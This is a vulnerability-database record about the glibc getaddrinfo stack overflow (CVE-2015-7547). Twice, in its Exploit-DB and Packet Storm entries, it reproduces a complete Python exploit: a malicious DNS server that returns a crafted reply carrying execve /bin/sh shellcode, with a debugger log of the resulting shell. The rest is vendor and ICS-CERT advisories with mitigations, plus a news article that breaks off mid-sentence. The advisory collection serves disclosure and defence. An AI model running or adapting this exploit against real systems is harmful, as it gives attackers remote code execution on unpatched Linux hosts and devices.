\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$(\ufffd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2 \r\ndata1_reply\r\ndata2_reply\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1 \r\nTCP Connected with 127.0.0.1:60260\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \ufffd\ufffd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$\ufffd7\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2 \r\ndata1_reply\r\ndata2_reply\r\nprocess 6415 is executing new program: /bin/dash\r\n$ id\r\nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)\r\n$ \r\n\r\n'''\r\n\r\nimport socket\r\nimport time\r\nimport struct\r\nimport threading\r\n\r\nIP = '192.168.111.5' # Insert your ip for bind() here...\r\nANSWERS1 = 184\r\n\r\nterminate = False\r\nlast_reply = None\r\nreply_now = threading.Event()\r\n\r\n\r\ndef dw(x):\r\n return struct.pack('>H', x)\r\n\r\ndef dd(x):\r\n return struct.pack('>I', x)\r\n\r\ndef dl(x):\r\n return struct.pack('<Q', x)\r\n\r\ndef db(x):\r\n return chr(x)\r\n\r\ndef udp_thread():\r\n global terminate\r\n\r\n # Handle UDP requests\r\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_udp.bind((IP, 53))\r\n\r\n reply_counter = 0\r\n counter = -1\r\n\r\n answers = []\r\n\r\n while not terminate:\r\n data, addr = sock_udp.recvfrom(1024)\r\n print '[UDP] Total Data len recv ' + str(len(data))\r\n id_udp = struct.unpack('>H', data[0:2])[0]\r\n query_udp = data[12:]\r\n\r\n # Send truncated flag... so it retries over TCP\r\n data = dw(id_udp) # id\r\n data += dw(0x8380) # flags with truncated set\r\n data += dw(1) # questions\r\n data += dw(0) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query_udp # question\r\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \r\n\r\n answers.append((data, addr))\r\n\r\n if len(answers) != 2:\r\n continue\r\n\r\n counter += 1\r\n\r\n if counter % 4 == 2:\r\n answers = answers[::-1]\r\n\r\n\r\n print 'udp send '\r\n time.sleep(0.01)\r\n sock_udp.sendto(*answers.pop(0))\r\n\r\n print 'sendto 1 '\r\n reply_now.wait()\r\n sock_udp.sendto(*answers.pop(0))\r\n print 'sendto 2 '\r\n\r\n sock_udp.close()\r\n\r\n\r\ndef tcp_thread():\r\n global terminate\r\n counter = -1\r\n\r\n #Open TCP socket\r\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_tcp.bind((IP, 53))\r\n sock_tcp.listen(10)\r\n\r\n print 'a'\r\n\t\r\n while not terminate:\r\n conn, addr = sock_tcp.accept()\r\n counter += 1\r\n print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])\r\n\r\n # Read entire packet\r\n data = conn.recv(1024)\r\n print '[TCP] Total Data len recv ' + str(len(data))\r\n\r\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\r\n print '[TCP] Request1 len recv ' + str(reqlen1)\r\n data1 = data[2:2+reqlen1]\r\n\r\n print 'data1 = ' +data1\r\n\r\n id1 = struct.unpack('>H', data1[0:2])[0]\r\n query1 = data[12:]\r\n\r\n print 'query = ' + query1\r\n\r\n # Do we have an extra request?\r\n data2 = None\r\n if len(data) > 2+reqlen1:\r\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\r\n print '[TCP] Request2 len recv ' + str(reqlen2)\r\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\r\n id2 = struct.unpack('>H', data2[0:2])[0]\r\n query2 = data2[12:]\r\n\r\n\r\n\r\n # Reply them on different packets\r\n data = ''\r\n data += dw(id1) # id\r\n data += dw(0x8180) # flags\r\n data += dw(1) # questions\r\n data += dw(ANSWERS1) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query1 # question\r\n\r\n\r\n\r\n for i in range(ANSWERS1):\r\n answer = dw(0xc00c) # name compressed\r\n answer += dw(1) # type A\r\n answer += dw(1) # class\r\n answer += dd(13) # ttl\r\n answer += dw(4) # data length\r\n answer += 'D' * 4 # data\r\n\r\n data += answer\r\n\r\n data1_reply = dw(len(data)) + data\r\n\r\n if data2:\r\n data = ''\r\n data += dw(id2)\r\n data += 'A' * (6)\r\n data += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += '\\x90' * (44)\r\n data += '\\x90' * (1955)\r\n data += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05'\r\n data += '\\x90' * (100)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'F' * (8)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'G' * (134)\r\n data2_reply = dw(len(data)) + data\r\n else:\r\n data2_reply = None\r\n\r\n reply_now.set()\r\n time.sleep(0.01)\r\n conn.sendall(data1_reply)\r\n print 'data1_reply'\r\n time.sleep(0.01)\r\n if data2:\r\n conn.sendall(data2_reply)\r\n print 'data2_reply'\r\n\r\n reply_now.clear()\r\n\r\n sock_tcp.shutdown(socket.SHUT_RDWR)\r\n sock_tcp.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n t = threading.Thread(target=udp_thread)\r\n t.daemon = True\r\n t.start()\r\n tcp_thread()\r\n terminate = True\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40339/"}, {"lastseen": "2016-02-21T18:24:34", "description": "glibc - getaddrinfo Stack-Based Buffer Overflow. CVE-2015-7547. Dos exploit for linux platform", "published": "2016-02-16T00:00:00", "type": "exploitdb", "title": "glibc - getaddrinfo Stack-Based Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-16T00:00:00", "id": "EDB-ID:39454", "href": "https://www.exploit-db.com/exploits/39454/", "sourceData": "Sources: \r\nhttps://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\nhttps://github.com/fjserna/CVE-2015-7547\r\n\r\nTechnical information:\r\n\r\nglibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query.\r\n\r\nLater on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\r\n\r\nUnder certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\r\n\r\nThe vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.\r\n\r\nWe are providing this code as-is. You are responsible for protecting yourself,\r\nyour property and data, and others from any risks caused by this code. This\r\ncode may cause unexpected and undesirable behavior to occur on your machine.\r\nThis code may not detect the vulnerability on your system.\r\n\r\nNote that this POC consists of two components: server code and client code.\r\nThe server code triggers the vulnerability and therefore will crash the client\r\ncode. Note also that it is necessary to set the nameserver to point to the\r\nserver code, and doing so could cause other programs that call into the\r\ngetaddrinfo() function to crash while testing is underway. This POC code is\r\nprovided \"as is\" with no warranties, whether express or implied, including\r\nwithout limitation any warranties or merchantability, fitness for a particular\r\nuse and noninfringement. Google assumes no responsibility for your proper\r\ninstallation and use of the POC code.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/fjserna/CVE-2015-7547/archive/master.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39454-1.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39454/"}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2016-02-17T14:21:52", "published": "2016-02-17T14:21:52", "id": "FEDORA:D5374605E7C9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: glibc-2.22-9.fc23", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1781", "CVE-2015-7547", "CVE-2015-8777"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2016-02-17T12:51:37", "published": "2016-02-17T12:51:37", "id": "FEDORA:E4AC9605712D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: glibc-2.21-11.fc22", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:22", "description": "", "published": "2016-09-06T00:00:00", "type": "packetstorm", "title": "glibc getaddrinfo Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "PACKETSTORM:138601", "href": "https://packetstormsecurity.com/files/138601/glibc-getaddrinfo-Stack-Buffer-Overflow.html", "sourceData": "`add by SpeeDr00t@Blackfalcon (jang kyoung chip) \n \nThis is a published vulnerability by google in the past. \nPlease refer to the link below. \n \nReference: \n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html \n- https://github.com/fjserna/CVE-2015-7547 \n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \n \nWhen Google announced about this code(vulnerability), \nit was missing information on shellcode. \nSo, I tried to completed the shellcode. \nIn the future, I hope to help your study. \n \n \n(gdb) gdb -q client1 \nUndefined command: \"gdb\". Try \"help\". \n(gdb) r \nStarting program: /home/haker/client1 \nGot object file from memory but can't read symbols: File truncated. \n[UDP] Total Data len recv 36 \n[UDP] Total Data len recv 36 \nudp send \nsendto 1 \nTCP Connected with 127.0.0.1:60259 \n[TCP] Total Data len recv 76 \n[TCP] Request1 len recv 36 \ndata1 = i?1/2i?1/2foobargooglecom \nquery = foobargooglecom$(i?1/2foobargooglecom \n[TCP] Request2 len recv 36 \nsendto 2 \ndata1_reply \ndata2_reply \n[UDP] Total Data len recv 36 \n[UDP] Total Data len recv 36 \nudp send \nsendto 1 \nTCP Connected with 127.0.0.1:60260 \n[TCP] Total Data len recv 76 \n[TCP] Request1 len recv 36 \ndata1 = i?1/2i?1/2foobargooglecom \nquery = foobargooglecom$i?1/27foobargooglecom \n[TCP] Request2 len recv 36 \nsendto 2 \ndata1_reply \ndata2_reply \nprocess 6415 is executing new program: /bin/dash \n$ id \nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) \n$ \n \n''' \n \nimport socket \nimport time \nimport struct \nimport threading \n \nIP = '192.168.111.5' # Insert your ip for bind() here... \nANSWERS1 = 184 \n \nterminate = False \nlast_reply = None \nreply_now = threading.Event() \n \n \ndef dw(x): \nreturn struct.pack('>H', x) \n \ndef dd(x): \nreturn struct.pack('>I', x) \n \ndef dl(x): \nreturn struct.pack('<Q', x) \n \ndef db(x): \nreturn chr(x) \n \ndef udp_thread(): \nglobal terminate \n \n# Handle UDP requests \nsock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nsock_udp.bind((IP, 53)) \n \nreply_counter = 0 \ncounter = -1 \n \nanswers = [] \n \nwhile not terminate: \ndata, addr = sock_udp.recvfrom(1024) \nprint '[UDP] Total Data len recv ' + str(len(data)) \nid_udp = struct.unpack('>H', data[0:2])[0] \nquery_udp = data[12:] \n \n# Send truncated flag... so it retries over TCP \ndata = dw(id_udp) # id \ndata += dw(0x8380) # flags with truncated set \ndata += dw(1) # questions \ndata += dw(0) # answers \ndata += dw(0) # authoritative \ndata += dw(0) # additional \ndata += query_udp # question \ndata += '\\x00' * 2500 # Need a long DNS response to force malloc \n \nanswers.append((data, addr)) \n \nif len(answers) != 2: \ncontinue \n \ncounter += 1 \n \nif counter % 4 == 2: \nanswers = answers[::-1] \n \n \nprint 'udp send ' \ntime.sleep(0.01) \nsock_udp.sendto(*answers.pop(0)) \n \nprint 'sendto 1 ' \nreply_now.wait() \nsock_udp.sendto(*answers.pop(0)) \nprint 'sendto 2 ' \n \nsock_udp.close() \n \n \ndef tcp_thread(): \nglobal terminate \ncounter = -1 \n \n#Open TCP socket \nsock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nsock_tcp.bind((IP, 53)) \nsock_tcp.listen(10) \n \nprint 'a' \n \nwhile not terminate: \nconn, addr = sock_tcp.accept() \ncounter += 1 \nprint 'TCP Connected with ' + addr[0] + ':' + str(addr[1]) \n \n# Read entire packet \ndata = conn.recv(1024) \nprint '[TCP] Total Data len recv ' + str(len(data)) \n \nreqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0]) \nprint '[TCP] Request1 len recv ' + str(reqlen1) \ndata1 = data[2:2+reqlen1] \n \nprint 'data1 = ' +data1 \n \nid1 = struct.unpack('>H', data1[0:2])[0] \nquery1 = data[12:] \n \nprint 'query = ' + query1 \n \n# Do we have an extra request? \ndata2 = None \nif len(data) > 2+reqlen1: \nreqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0]) \nprint '[TCP] Request2 len recv ' + str(reqlen2) \ndata2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2] \nid2 = struct.unpack('>H', data2[0:2])[0] \nquery2 = data2[12:] \n \n \n \n# Reply them on different packets \ndata = '' \ndata += dw(id1) # id \ndata += dw(0x8180) # flags \ndata += dw(1) # questions \ndata += dw(ANSWERS1) # answers \ndata += dw(0) # authoritative \ndata += dw(0) # additional \ndata += query1 # question \n \n \n \nfor i in range(ANSWERS1): \nanswer = dw(0xc00c) # name compressed \nanswer += dw(1) # type A \nanswer += dw(1) # class \nanswer += dd(13) # ttl \nanswer += dw(4) # data length \nanswer += 'D' * 4 # data \n \ndata += answer \n \ndata1_reply = dw(len(data)) + data \n \nif data2: \ndata = '' \ndata += dw(id2) \ndata += 'A' * (6) \ndata += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00' \ndata += '\\x90' * (44) \ndata += '\\x90' * (1955) \ndata += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05' \ndata += '\\x90' * (100) \ndata += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00' \ndata += 'F' * (8) \ndata += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00' \ndata += 'G' * (134) \ndata2_reply = dw(len(data)) + data \nelse: \ndata2_reply = None \n \nreply_now.set() \ntime.sleep(0.01) \nconn.sendall(data1_reply) \nprint 'data1_reply' \ntime.sleep(0.01) \nif data2: \nconn.sendall(data2_reply) \nprint 'data2_reply' \n \nreply_now.clear() \n \nsock_tcp.shutdown(socket.SHUT_RDWR) \nsock_tcp.close() \n \n \nif __name__ == \"__main__\": \n \nt = threading.Thread(target=udp_thread) \nt.daemon = True \nt.start() \ntcp_thread() \nterminate = True \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138601/glibcgetaddrinfo-overflow.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:32:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "\nFabio Olive Leite reports:\n\nA stack-based buffer overflow was found in libresolv when invoked\n\t from nss_dns, allowing specially crafted DNS responses to seize\n\t control of EIP in the DNS client. The buffer overflow occurs in the\n\t functions send_dg (send datagram) and send_vc (send TCP) for the\n\t NSS module libnss_dns.so.2 when calling getaddrinfo with AF_UNSPEC\n\t family, or in some cases AF_INET6 family. The use of AF_UNSPEC (or\n\t AF_INET6 in some cases) triggers the low-level resolver code to\n\t send out two parallel queries for A and AAAA. A mismanagement of\n\t the buffers used for those queries could result in the response of\n\t a query writing beyond the alloca allocated buffer created by\n\t __res_nquery.\n\n", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "2DD7E97E-D5E8-11E5-BCBD-BC5FF45D0F28", "href": "https://vuxml.freebsd.org/freebsd/2dd7e97e-d5e8-11e5-bcbd-bc5ff45d0f28.html", "title": "glibc -- getaddrinfo stack-based buffer overflow", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2020-12-24T13:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "A vulnerability in the GNU libc (glibc) DNS resolver allows remote code execution (CVE-2015-7547). However, this issue can be exploited only from a DNS server that is under the control of an attacker. (Ref # 91886).\nThis glibc issue is only exploitable by an attacker controlling the DNS server configured for the device. Furthermore, the attacker must overcome additional anti-exploitation mitigations, such as ASLR, to mount a successful attack.\nThis issue affects PAN-OS 5.0.19 and earlier; PAN-OS 5.1.12 and earlier; PAN-OS 6.0.14 and earlier; PAN-OS 6.1.12 and earlier; PAN-OS 7.0.7 and earlier; PAN-OS 7.1.3 and earlier\n\n**Work around:**\nThis vulnerability can affect PAN-OS software only when the device is configured with a DNS server that is under the control of an attacker. Palo Alto Networks discourages configuring the device with untrusted DNS servers.", "edition": 6, "modified": "2016-08-15T19:00:00", "published": "2016-08-15T19:00:00", "id": "PAN-SA-2016-0021", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2015-7547", "title": "Glibc DNS Resolver Vulnerability", "type": "paloalto", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:31", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "**a. glibc update for multiple products.**\n\nThe glibc library has been updated in multiple products to resolve a stack buffer overflow present in the glibc getaddrinfo function. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2015-7547. \n\n\nVMware products have been grouped into the following four categories: \n \n**I) ESXi and ESX Hypervisor** \n \nVersions of ESXi and ESX prior to 5.5 are not affected because they do not ship with a vulnerable version of glibc. ESXi 5.5 and ESXi 6.0 ship with a vulnerable version of glibc and are affected. \nSee table 1 for remediation for ESXi 5.5 and ESXi 6.0. \n \n**II) Windows-based products** \n \nWindows-based products, including all versions of vCenter Server running on Windows, are not affected.\n\n \n**III) VMware virtual appliances** \n \nVMware virtual appliances ship with a vulnerable version of glibc and are affected. \nSee table 2 for remediation for appliances. \n \n**IV) Products that run on Linux** \n \nVMware products that run on Linux (excluding virtual appliances) might use a vulnerable version of glibc as part of the base operating system. If the operating system has a vulnerable version of glibc, VMware recommends that customers contact their operating system vendor for resolution. \n \n**WORKAROUND** \n \nWorkarounds are available for several virtual appliances. These are documented in [VMware KB article 2144032](<http://kb.vmware.com/kb/2144032>). \n \n**RECOMMENDATIONS** \n\n\nVMware recommends customers evaluate and deploy patches for affected products in Table 1 and 2 below as these patches become available. In case patches are not available, customers are advised to deploy the workaround. \n \n \nColumn 4 of the following tables lists the action required to remediate the vulnerability in each release, if a solution is available. \n \nTable 1 - ESXi \n\n", "edition": 4, "modified": "2016-02-23T00:00:00", "published": "2016-02-22T00:00:00", "id": "VMSA-2016-0002", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0002.html", "title": "VMware product updates address a critical glibc security vulnerability", "type": "vmware", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2021-02-27T19:53:44", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the advisory update titled ICSA-16-103-01B Siemens Industrial Products glibc Library Vulnerability that was published July 14, 2016, on the NCCIC/ICS-CERT web site.\n\nSiemens reports that a buffer overflow vulnerability in the glibc library could affect several of its industrial products.\n\n### **\\--------- Begin Update C Part 1 of 3 --------**\n\nSiemens has produced updates to mitigate this vulnerability in ROX II, APE devices, SINEMA Remote Connect, Basic RT V13, and SCALANCE M-800/S615.\n\n### **\\--------- End Update C Part 1 of 3 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nSiemens reports that the vulnerability affects the following products:\n\n * ROX II: V2.3.0-V2.9.0 (inclusive),\n * APE (Linux): All versions,\n * SINEMA Remote Connect: All versions prior to Version 1.2,\n\n### **\\--------- Begin Update C Part 2 of 3 --------**\n\n * SCALANCE M-800/S615: All versions prior to version 4.02, and\n\n### **\\--------- End Update C Part 2 of 3 ----------**\n\n * Basic RT V13: All versions prior to V13 SP1 Update 9\n\n## IMPACT\n\nAn attacker who successfully exploits this vulnerability may be able to cause a denial-of-service condition in the affected devices or possibly execute arbitrary code.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nSiemens ROX-based devices are used to connect devices that operate in harsh environments such as electric utility substations and traffic control cabinets. RUGGEDCOM APE is a utility-grade computing platform that plugs directly into any member of the RUGGEDCOM RX1500 family and makes it possible to run third-party software applications without an external industrial PC. SINEMA Remote Connect is a management platform for remote networks allowing users to manage and maintain tunnel connections (VPN) between networks, machines, and sites. SCALANCE security modules provide filtering of incoming and outgoing network connections with stateful packet inspection.\n\nAccording to Siemens, the affected devices are deployed across several sectors including Chemical, Communications, Critical Manufacturing, Dams, Energy, Food and Agriculture, Government Facilities, Healthcare and Public Health, Transportation Systems, and Water and Wastewater Systems. Siemens estimates that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThere is a stack-based buffer overflow vulnerability in the glibc library\u2019s DNS client side resolver.\n\nCVE-2015-7547b has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been calculated; the CVSS vector string is (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nCrafting a working exploit for this vulnerability would be difficult.\n\n## MITIGATION\n\nSiemens provides updates for the following products and encourages customers to update their products:\n\n * ROX II: Update to version 2.9.1\n * Submit a support request online\n\n<https://www.siemens.com/automation/support-request>\n\n * Call a local hotline center:\n\n<https://w3.siemens.com/aspa_app/>\n\n * APE (Linux): Follow update process provided in the corresponding application note:\n\n<http://support.automation.siemens.com/WW/view/en/109485761>\n\n * Basic RT V13: Update to Version V13 SP 1 Update 9:\n\n<https://support.industry.siemens.com/cs/ww/en/view/109311724>\n\n * SINEMA Remote Connect software update for Version 1.2 is available at the following link:\n\n<https://support.industry.siemens.com/cs/ww/en/view/109737963>\n\n### **\\--------- Begin Update C Part 3 of 3 --------**\n\n * SCALANCE M-800/S615: Update to V4.02:\n\n<https://support.industry.siemens.com/cs/ww/en/view/109740858>\n\nSiemens recommends applying the following mitigations until patches can be applied:\n\n### **\\--------- End Update C Part 3 of 3 --------**\n\n * Disable use of DNS on affected devices if possible.\n * Use trusted DNS servers, trusted networks/providers, and known trusted DNS domains in device configuration.\n\nOR\n\n * Limit size of DNS responses to 512 bytes for UDP messages, and 1024 bytes for TCP messages on network border.\n\nAs a general security measure, Siemens strongly recommends to protect network access to nonperimeter devices with appropriate mechanisms. It is advised to configure the environment according to Siemens operational guidelines in order to run the devices in a protected IT environment.\n\nFor more information on this vulnerability and more detailed mitigation instructions, please see Siemens Security Advisory SSA-301706 at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * aCWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 12, 2016.\n * bNVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7547, web site last accessed April 12, 2016.\n * cCVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed April 12, 2016.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-16-103-01>); we'd welcome your feedback.\n", "modified": "2018-08-23T00:00:00", "published": "2016-04-12T00:00:00", "id": "ICSA-16-103-01", "href": "https://www.us-cert.gov/ics/advisories/ICSA-16-103-01", "type": "ics", "title": "Siemens Industrial Products glibc Library Vulnerability (Update C)", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T10:06:54", "bulletinFamily": "info", "cvelist": ["CVE-2015-0235", "CVE-2015-7547"], "description": "[![glibc-linux-flaw](https://3.bp.blogspot.com/-_4EpHCqniVA/VsQtYB5WSwI/AAAAAAAAmuc/xFGkZE8C85Q/s1600/glibc-linux-flaw.png)](<https://3.bp.blogspot.com/-_4EpHCqniVA/VsQtYB5WSwI/AAAAAAAAmuc/xFGkZE8C85Q/s1600/glibc-linux-flaw.png>)\n\nA highly critical vulnerability has been uncovered in the **GNU C Library (glibc)**, a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.\n\n \n\n\nJust clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and many more.\n\n \n\n\nThe vulnerability is similar to the last year's [GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) (CVE-2015-0235) that left countless machines vulnerable to_ remote code execution (RCE) attacks_, representing a major Internet threat.\n\n \n\n\nGNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.\n\n \n\n\nThe recent flaw, which is indexed as _CVE-2015-7547_, is a **stack-based buffer overflow** vulnerability in glibc's DNS client-side resolver that is used to translate human-readable domain names, like google.com, into a network IP address.\n\n \n\n\nThe buffer overflow flaw is triggered when the _getaddrinfo() library function_ that performs domain-name lookups 